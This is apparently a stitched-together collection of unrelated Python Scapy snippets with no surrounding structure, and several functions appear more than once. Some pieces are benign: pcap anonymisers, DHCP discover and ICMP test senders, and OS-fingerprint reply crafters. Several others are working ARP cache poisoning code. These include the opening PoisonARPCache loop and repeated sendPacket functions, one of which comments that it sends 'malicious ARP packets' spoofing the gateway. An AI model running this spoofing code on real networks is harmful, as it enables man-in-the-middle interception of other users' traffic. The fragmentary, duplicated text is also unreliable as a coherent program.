def PoisonARPCache(): # Constructing packet for Victim A frameA = Ether() frameA.src = ATTACKER_MAC frameA.dst = VICTIM_A_MAC arpA = ARP() arpA.hwsrc = ATTACKER_MAC arpA.psrc = VICTIM_B_IP arpA.pdst = VICTIM_A_IP arpA.op = 1 # Constructing packet for Victim B frameB = Ether() frameB.src = ATTACKER_MAC frameB.dst = VICTIM_B_MAC arpB = ARP() arpB.hwsrc = ATTACKER_MAC arpB.psrc = VICTIM_A_IP arpB.pdst = VICTIM_B_IP arpB.op = 1 packetA = frameA/arpA packetB = frameB/arpB while True: sendp(packetA) sendp(packetB) sleep(5)
def service_craft(pkt, fp, mac, service, type_=False):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.ttl, 16)
ip.flags = 0x4000
tcp = TCP()
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
if type_:
tcp.flags = 0x018 # PSH / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].ack
data = service[pkt[TCP].dport]
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
return fin_pkt
else:
tcp.flags = 0x012 # SYN / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].seq + 1
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def Ether_layer(attributes):
layer2 = Ether()
layer2.dst = attributes['dst']
layer2.src = attributes['src']
layer2.type = attributes['type']
return layer2
def seqgen_pkt_craft(pkt, fp, mac, pno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['T1']['TTL'], 16)
ip.flags = fp.probe['T1']['DF']
ip.id = fp.ip_id_gen()
tcp = TCP()
s_val = fp.probe['T1']['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = fp.tcp_seq_gen()
a_val = fp.probe['T1']['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe['T1']['F']
tcp.flags = flag_val
tcp.window = fp.probe['WIN']['W' + pno]
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
tcp.options = fp.probe['OPS']['O' + pno]
rd_val = fp.probe['T1']['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def inject_packet(self, iface, dst_mac):
ether_part = Ether(src='00:00:00:00:00:00', dst=dst_mac)
ip_part = IP(ttl=1, src='0.0.0.0', dst='224.0.0.1')
igmp_part = IGMP(type=0x11)
igmp_part.mrtime = (self.max_resp_time / 100) & 0xff
igmp_part.igmpize(ether=ether_part, ip=ip_part)
# Make this IGMP query packet as an unicast packet
ether_part.dst = dst_mac
sendp(ether_part / ip_part / igmp_part, iface=iface, verbose=False)
def sanitize(filepath_in,
filepath_out=None,
sequential=True,
ipv4_mask=0,
ipv6_mask=0,
mac_mask=0,
start_ipv4='10.0.0.1',
start_ipv6='2001:aa::1',
start_mac='00:aa:00:00:00:00'):
if not filepath_out:
timestamp = datetime.datetime.now().strftime('%y%m%d-%H%m%S')
filepath_out = os.path.splitext(filepath_in)[
0] + '_sanitized_' + timestamp + os.path.splitext(filepath_in)[1]
mac_gen = MACGenerator(sequential=sequential,
mask=mac_mask,
start_mac=start_mac)
ip4_gen = IPv4Generator(sequential=sequential,
mask=ipv4_mask,
start_ip=start_ipv4)
ip6_gen = IPv6Generator(sequential=sequential,
mask=ipv6_mask,
start_ip=start_ipv6)
with open(filepath_in) as capfile:
#open cap file with pcapfile
cap = savefile.load_savefile(capfile, verbose=False)
#use scapy's pcapwriter
pktwriter = PcapWriter(filepath_out, append=True)
try:
for pkt in cap.packets:
#create scapy packet from pcapfile packet raw output
pkt = Ether(pkt.raw())
#MAC addresses
pkt.src = mac_gen.get_mac(pkt.src)
pkt.dst = mac_gen.get_mac(pkt.dst)
#IP Address
try:
pkt['IP'].src = ip4_gen.get_ip(pkt['IP'].src)
pkt['IP'].dst = ip4_gen.get_ip(pkt['IP'].dst)
except IndexError:
pkt['IPv6'].src = ip6_gen.get_ip(pkt['IPv6'].src)
pkt['IPv6'].dst = ip6_gen.get_ip(pkt['IPv6'].dst)
pktwriter.write(pkt)
finally:
pktwriter.close()
return filepath_out.split('/')[-1]
def inject_packet(self, iface, dst_mac):
ether_part = Ether(src='00:00:00:00:00:00', dst=dst_mac)
ip_part = IP(ttl=1, src='0.0.0.0', dst='224.0.0.1')
igmp_part = IGMP(type=0x11)
igmp_part.mrtime = (self.max_resp_time / 100) & 0xff
igmp_part.igmpize(ether=ether_part, ip=ip_part)
# Make this IGMP query packet as an unicast packet
ether_part.dst = dst_mac
sendp(ether_part / ip_part / igmp_part, iface=iface, verbose=False)
def udp_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['U1']['TTL'], 16)
ip.flags = fp.probe['U1']['DF']
ip.len = 56
ip.id = 4162
icmp = ICMP()
icmp.type = 3
icmp.unused = 0
icmp.code = 13 # code 3 for reply
iperror = IPerror()
iperror.proto = 'udp'
iperror.ttl = 0x3E
iperror.len = fp.probe['U1']['RIPL']
iperror.id = fp.probe['U1']['RID']
ripck_val = fp.probe['U1']['RIPCK']
if ripck_val == 'G':
pass
elif ripck_val == 'Z':
iperror.chksum = 0
else:
iperror.chksum = pkt[IP].chksum
udperror = UDPerror()
udperror.sport = pkt[UDP].sport
udperror.dport = pkt[UDP].dport
udperror.len = pkt[UDP].len
if fp.probe['U1']['RUCK'] == 'G':
udperror.chksum = pkt[UDP].chksum
else:
udperror.chksum = fp.probe['U1']['RUCK']
try:
ipl = int(fp.probe['U1']['IPL'], 16)
except KeyError:
ipl = None
data = pkt[Raw].load
fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data
return fin_pkt
def sanitize(
filepath_in,
filepath_out=None,
sequential=True,
ipv4_mask=0,
ipv6_mask=0,
mac_mask=0,
start_ipv4="10.0.0.1",
start_ipv6="2001:aa::1",
start_mac="00:aa:00:00:00:00",
):
if not filepath_out:
timestamp = datetime.datetime.now().strftime("%y%m%d-%H%m%S")
filepath_out = os.path.splitext(filepath_in)[0] + "_sanitized_" + timestamp + os.path.splitext(filepath_in)[1]
mac_gen = MACGenerator(sequential=sequential, mask=mac_mask, start_mac=start_mac)
ip4_gen = IPv4Generator(sequential=sequential, mask=ipv4_mask, start_ip=start_ipv4)
ip6_gen = IPv6Generator(sequential=sequential, mask=ipv6_mask, start_ip=start_ipv6)
with open(filepath_in) as capfile:
# open cap file with pcapfile
cap = savefile.load_savefile(capfile, verbose=False)
# use scapy's pcapwriter
pktwriter = PcapWriter(filepath_out, append=True)
try:
for pkt in cap.packets:
# create scapy packet from pcapfile packet raw output
pkt = Ether(pkt.raw())
# MAC addresses
pkt.src = mac_gen.get_mac(pkt.src)
pkt.dst = mac_gen.get_mac(pkt.dst)
# IP Address
try:
pkt["IP"].src = ip4_gen.get_ip(pkt["IP"].src)
pkt["IP"].dst = ip4_gen.get_ip(pkt["IP"].dst)
except IndexError:
pkt["IPv6"].src = ip6_gen.get_ip(pkt["IPv6"].src)
pkt["IPv6"].dst = ip6_gen.get_ip(pkt["IPv6"].dst)
pktwriter.write(pkt)
finally:
pktwriter.close()
return filepath_out.split("/")[-1]
def ecn_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['ECN']['TTL'], 16)
ip_flag = fp.probe['ECN']['DF']
if ip_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0
ip.id = fp.ip_id_gen()
tcp = TCP()
w_val = fp.probe['ECN']['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
cc_val = fp.probe['ECN']['CC']
if cc_val == 'Y':
tcp.flags = 0x52
elif cc_val == 'N':
tcp.flags = 0x12
elif cc_val == 'S':
tcp.flags = 0xD2
else:
tcp.flags = 0x10
o_val = fp.probe['ECN']['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def recv_resp_poke(i: int) -> None:
with configure_eth_if() as so:
so.settimeout(10)
try:
eth_frame = Ether(so.recv(60))
if eth_frame.type == 0x2222 and eth_frame.load[0] == 0xfa:
if eth_frame.load[1] != i:
raise Exception('Missed Poke Packet')
eth_frame.dst = eth_frame.src
eth_frame.src = so.getsockname()[4]
eth_frame.load = bytes.fromhex('fb') # POKE_RESP code
so.send(raw(eth_frame))
except Exception as e:
raise e
def sendPackets(gateway_ip, target_ip, this_mac_address, target_mac_address):
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = this_mac_address
arp = arp
arp.pdst = target_ip # (say IP address of target machine)
arp.hwdst = target_mac_address # target mac
ether = Ether()
ether.src = this_mac_address
ether.dst = target_mac_address
arp.op = 2
def broadcast():
packet = ether / arp
sendp(x=packet, verbose=True)
broadcast()
def icmp_craft(pkt, fp, mac):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['IE']['TTL'], 16)
dfi_flag = fp.probe['IE']['DFI']
if dfi_flag == 'N':
ip.flags = 0
elif dfi_flag == 'S':
ip.flags = pkt[IP].flags
elif dfi_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0 if pkt[IP].flags == 2 else 2
ip.id = fp.ip_id_icmp_gen()
icmp = ICMP()
icmp.type = 0
icmp.id = pkt[ICMP].id
cd_val = fp.probe['IE']['CD']
if cd_val == 'Z':
icmp.code = 0
elif cd_val == 'S':
icmp.code = pkt[ICMP].code
else:
icmp.code = random.randint(0, 15)
icmp.seq = pkt[ICMP].seq
data = pkt[ICMP].payload
fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data
return fin_pkt
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
# Function for sending the malicious ARP packets out with the specified data
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
packet = ether / arp
sendp(x=packet, verbose=False)
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
'''
Sample script to send a DHCP discover
'''
import scapy
from scapy.sendrecv import sendp, sniff
from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP
# data link layer
ethernet = Ether()
ethernet.dst = 'ff:ff:ff:ff:ff:ff'
# network layer
ip = IP()
ip.dst = '255.255.255.255'
# transport layer
udp = UDP()
udp.sport = 68
udp.dport = 67
# application layer
bootp = BOOTP()
bootp.flags = 1
dhcp = DHCP()
dhcp.options = [("message-type", "discover"), "end"]
packet = ethernet / ip / udp / bootp / dhcp
ans = srp1(packet)
def t2tot7_craft(pkt, fp, mac, tno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe[tno]['TTL'], 16)
ip.flags = fp.probe[tno]['DF']
ip.id = random.randint(1, 1000)
tcp = TCP()
s_val = fp.probe[tno]['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = pkt[TCP].ack + 369
a_val = fp.probe[tno]['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe[tno]['F']
tcp.flags = flag_val
w_val = fp.probe[tno]['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
o_val = fp.probe[tno]['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
rd_val = fp.probe[tno]['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
assert len(sys.argv) == 8
#*** Get parameters from command line
SRC_MAC = sys.argv[1]
DST_MAC = sys.argv[2]
SRC_IP = sys.argv[3]
DST_IP = sys.argv[4]
IF_NAME = sys.argv[5]
REPEAT_INTERVAL = float(sys.argv[6])
REPEAT_COUNT = int(sys.argv[7])
data = "blahblahblah"
# define ip and icmp
eth = Ether()
eth.src=SRC_MAC
eth.dst=DST_MAC
ip = IP()
ip.src = SRC_IP
ip.dst = DST_IP
icmp = ICMP()
icmp.type = 8
icmp.code = 0
finished = 0
count = 0
while not finished:
sendp(eth/ip/icmp/data, iface=IF_NAME)
time.sleep(REPEAT_INTERVAL)
count += 1
if count >= REPEAT_COUNT:
finished = 1
""" A very basic script to send a DHCP Discover message. Capture the packages to see what's wrong. """ import scapy from scapy.sendrecv import sendp, sniff from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP # data link layer ethernet = Ether() ethernet.show() ethernet.dst = "ff:ff:ff:ff:ff:ff" # network layer ip = IP() ip.show() ip.dst = "255.255.255.255" # transport layer udp = UDP() udp.show() udp.sport = 68 udp.dport = 67 # application layer bootp = BOOTP() bootp.show() bootp.flags = 1 dhcp = DHCP() dhcp.show()
def sanitize(filepath_in,
filepath_out=None,
sequential=True,
ipv4_mask=0,
ipv6_mask=0,
mac_mask=0,
start_ipv4='10.0.0.1',
start_ipv6='2001:aa::1',
start_mac='00:aa:00:00:00:01',
info=True):
if not filepath_out:
timestamp = datetime.datetime.now().strftime('%y%m%d-%H%m%S')
filepath_out = os.path.splitext(filepath_in)[
0] + '_sanitized_' + timestamp + os.path.splitext(filepath_in)[1]
mac_gen = MACGenerator(sequential=sequential,
mask=mac_mask,
start_mac=start_mac)
ip4_gen = IPv4Generator(sequential=sequential,
mask=ipv4_mask,
start_ip=start_ipv4)
ip6_gen = IPv6Generator(sequential=sequential,
mask=ipv6_mask,
start_ip=start_ipv6)
with open(filepath_in) as capfile:
#open cap file with pcapfile
cap = savefile.load_savefile(capfile, verbose=False)
#use scapy's pcapwriter
pktwriter = PcapWriter(filepath_out, append=True)
try:
for pkt in cap.packets:
#create scapy packet from pcapfile packet raw output
new_pkt = Ether(pkt.raw())
#MAC addresses
try:
new_pkt.src = mac_gen.get_mac(new_pkt.src)
new_pkt.dst = mac_gen.get_mac(new_pkt.dst)
except:
pass
#IP Addresses
try:
new_pkt['IP'].src = ip4_gen.get_ip(new_pkt['IP'].src)
new_pkt['IP'].dst = ip4_gen.get_ip(new_pkt['IP'].dst)
except IndexError:
pass
try:
new_pkt['IPv6'].src = ip6_gen.get_ip(new_pkt['IPv6'].src)
new_pkt['IPv6'].dst = ip6_gen.get_ip(new_pkt['IPv6'].dst)
except IndexError:
pass
#sanitize ARP addresses
try:
new_pkt['ARP'].hwsrc = mac_gen.get_mac(
new_pkt['ARP'].hwsrc)
new_pkt['ARP'].hwdst = mac_gen.get_mac(
new_pkt['ARP'].hwdst)
new_pkt['ARP'].psrc = ip4_gen.get_ip(new_pkt['ARP'].psrc)
new_pkt['ARP'].pdst = ip4_gen.get_ip(new_pkt['ARP'].pdst)
except IndexError:
pass
#fix checksum in each layer, starting at the top layer
for layer in range(12, 0, -1):
try:
del new_pkt[layer].chksum
except:
pass
pktwriter.write(new_pkt)
finally:
pktwriter.close()
if info:
print 'This file has %s IPv4/IPv6 endpoints and %s MAC endpoints' % (
len(ip4_gen.mappings) + len(ip6_gen.mappings), len(
mac_gen.mappings))
print 'File created: %s' % filepath_out
